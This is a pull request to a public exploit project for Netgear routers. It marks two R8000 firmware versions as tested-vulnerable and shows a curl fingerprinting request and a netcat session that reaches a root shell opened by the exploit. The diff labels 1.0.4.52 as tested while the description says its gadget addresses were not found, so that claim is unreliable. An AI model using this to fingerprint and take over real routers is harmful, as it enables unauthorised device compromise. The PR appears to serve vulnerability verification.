### PR TITLE
Verified R8000 firmware version 1.0.4.46 and 1.0.4.52 vulnerable

### DIFF
--- a/2020.06.15-netgear/exploit.py
+++ b/2020.06.15-netgear/exploit.py
@@ -478,8 +478,8 @@
 #   R7900       V1.0.0.8_10.0.5       72b987220f836ba90ba96fc8f3c3e6b8  Untested
 #   R7900       V1.0.0.6_10.0.4       255ef90a187d7faf01afa62aa2e16844  Untested
 #   R7900       V1.0.0.2_10.0.1       7b6bd468b060ac4fb17084c20898caa4  Untested
-#   R8000       V1.0.4.52_10.1.67     83559fd57588fc19d937c83335d04a5e  Untested
-#   R8000       V1.0.4.46_10.1.63     da80add1588ea779156ec23b58421a0e  Untested
+#   R8000       V1.0.4.52_10.1.67     83559fd57588fc19d937c83335d04a5e  Tested
+#   R8000       V1.0.4.46_10.1.63     da80add1588ea779156ec23b58421a0e  Tested
 #   R8000       V1.0.4.28_10.1.54     a93e7d1ca961c5d381c1c93b8f85168b  Untested
 #   R8000       V1.0.4.18_10.1.49     45d86327a2dbbad50f65d04480bb91fd  Untested
 #   R8000       V1.0.4.12_10.1.46     917d43c1bf1805db4d52ed37d360340f  Untested

--- a/2020.06.15-netgear/notes.txt
+++ b/2020.06.15-netgear/notes.txt
@@ -53,7 +53,7 @@ The exploit has been tested to work against the following devices and versions:
 * R6300v2 version 1.0.3.6CH, 1.0.3.8, and 1.0.4.32
 * R6400 version 1.0.1.20, 1.0.1.36, and 1.0.1.44
 * R7000 versions 9.88, 9.64, 9.60, 9.42, 9.34, 9.18, 9.14, 9.12, 9.10, 9.6, and 8.34
-* R8000 version 1.0.4.18
+* R8000 version 1.0.4.18, 1.0.4.46
 * R8300 version 1.0.2.128 and 1.0.2.130
 * R8500 version 1.0.0.28
 * WGR614v9 version 1.2.32NA


### PR DESCRIPTION
```
    $ curl http://192.168.1.1/currentsetting.htm
    Firmware=V1.0.4.46_10.1.63
    RegionTag=R8000_
    Region=
    Model=R8000
    InternetConnectionStatus=Up
    ParentalControlSupported=1
    CircleEnabled=0
    OpenDNSEnabled=0
    SOAPVersion=3.21
    LoginMethod=2.0
    ReadyShareSupportedLevel=29
    XCloudSupported=1
    SmartNetworkSupported=0
    DeviceMode=0
```
```
    $ nc 192.168.1.1 8888
    BusyBox v1.7.2 (2019-07-24 11:04:23 CST) built-in shell (ash)
    Enter 'help' for a list of built-in commands.
    ps -w | grep telnet
    24137 admin      3080 S   telnetenabled
    26160 admin       652 S   /bin/utelnetd -p8888 -l/bin/sh -d
    27666 admin      2904 S   grep telnet
```

While a firmware version 1.0.4.52_10.1.67 is released, I have not located the system syscall & gadget address. The 1.0.4.52_10.1.67 release notes do not mention this problem.